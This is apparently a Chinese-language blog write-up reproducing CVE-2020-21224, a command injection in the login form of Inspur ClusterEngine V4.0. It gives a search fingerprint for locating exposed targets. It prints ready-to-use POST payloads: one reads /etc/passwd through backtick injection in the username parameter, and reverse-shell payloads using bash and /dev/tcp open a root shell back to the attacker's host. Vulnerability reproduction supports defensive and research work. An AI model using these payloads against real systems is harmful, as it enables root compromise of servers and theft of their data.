浪潮ClusterEngineV4.0 远程命令执行漏洞 #CVE-2020-21224

漏洞描述

浪潮服务器群集管理系统存在危险字符未过滤,导致远程命令执行。

漏洞影响

浪潮ClusterEngineV4.0

网络测绘

title=”TSCEV4.0″

漏洞复现

登录页面如下

20240401103933649-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010782.45b467e3_2024-04-01_10-39-16 (1)

 

由于登录页面没有发现验证码,进行账号爆破

当burpsuite爆破完成时,注意到POST数据中如果带有 ;’ ,响应数据包发生异常。

20240401104012443-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010591.ea599ad3_2024-04-01_10-40-00 (1)

通过响应包信息,猜测可能存在一个远程执行代码漏洞,并将此数据包放在repeater中,我发现如果发布数据中有一个 ‘ ,系统将抛出异常。

20240401104054414-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010607.9fd7359d_2024-04-01_10-40-45 (1)

20240401104124321-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010737.b356de01_2024-04-01_10-41-15 (1)

进一步测试时,我发现username参数或password任一参数如果包含 ‘ ,将引发此异常

20240401104218717-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010569.2b572637_2024-04-01_10-41-52 (1)

定尝试发送 ‘ ‘ 来查看响应包。

20240401110513258-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010691.bcaaf085_2024-04-01_10-42-43 (1)

我注意到 grep 命令错误,服务端的代码可能是这样

var1 = `grep xxxx` 
var2 = $(python -c "from crypt import crypt;print crypt('$username','$1$$var1')")

尝试发送 -V 和 –help 来查看响应包,响应包证实了猜测

20240401110604162-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010799.7b05fd48_2024-04-01_11-05-53 (1)

20240401110705613-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125011095.4de57e47 (1)

尝试读取 /etc/passswd

20240401110759525-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010886.6366fda6_2024-04-01_11-07-33 (1)

尝试列目录

20240401110833644-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010997.d7da3d5c_2024-04-01_11-08-23 (1)

确认存在一个远程执行命令执行漏洞,经过fuzz,得到以下payload

20240401110908817-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125010953.85fde8ca_2024-04-01_11-08-59 (1)

20240401110944254-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125011508.d4e702b5_2024-04-01_11-09-28 (1)

反弹 shell

op=login&username=1 2\',\'1\'\); `bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F80%200%3E%261`

payload发送后, 在 kali linux 服务器上获取了一个 root 权限的 shell

20240401111024745-png (9)

上面是原文的测试思路,但经过重新测试之后发现还有另一种简单方法

POC测试(出现 root:x:0:0 则存在漏洞)
op=login&username=test`$(cat /etc/passwd)`

{"err":"/bin/sh: root:x:0:0:root:/root:/bin/bash: No such file or directory\n","exitcode":1,"out":"the user test does not exist\nerror:1\n"}

反弹shell
op=login&username=test`$(bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F{IP}}%2F{PORT}%200%3E%261)`

20240401111103622-watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10-20220313125011101.b269a4c2_2024-04-01_11-10-53 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容